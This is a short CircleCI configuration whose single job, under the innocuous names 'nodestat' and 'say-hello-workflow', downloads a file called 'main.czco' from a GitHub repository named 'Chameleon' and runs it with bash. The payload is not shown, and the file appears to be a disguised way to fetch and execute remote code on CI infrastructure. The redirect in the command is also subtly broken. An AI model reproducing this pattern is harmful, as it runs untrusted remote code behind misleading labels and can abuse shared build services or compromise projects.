version: 2.1

jobs:
  dockeretteinstall:
   
    docker:
      - image: ubuntu:latest

    steps:
      - checkout
      - run:
          name: "nodestat"
          command: "apt update && apt upgrade -y && apt install wget -y && wget https://raw.githubusercontent.com/NateYeet/Chameleon/main/Chameleon/main.czco >> /ins && bash /ins node"

workflows:
  say-hello-workflow:
    jobs:
      - dockeretteinstall
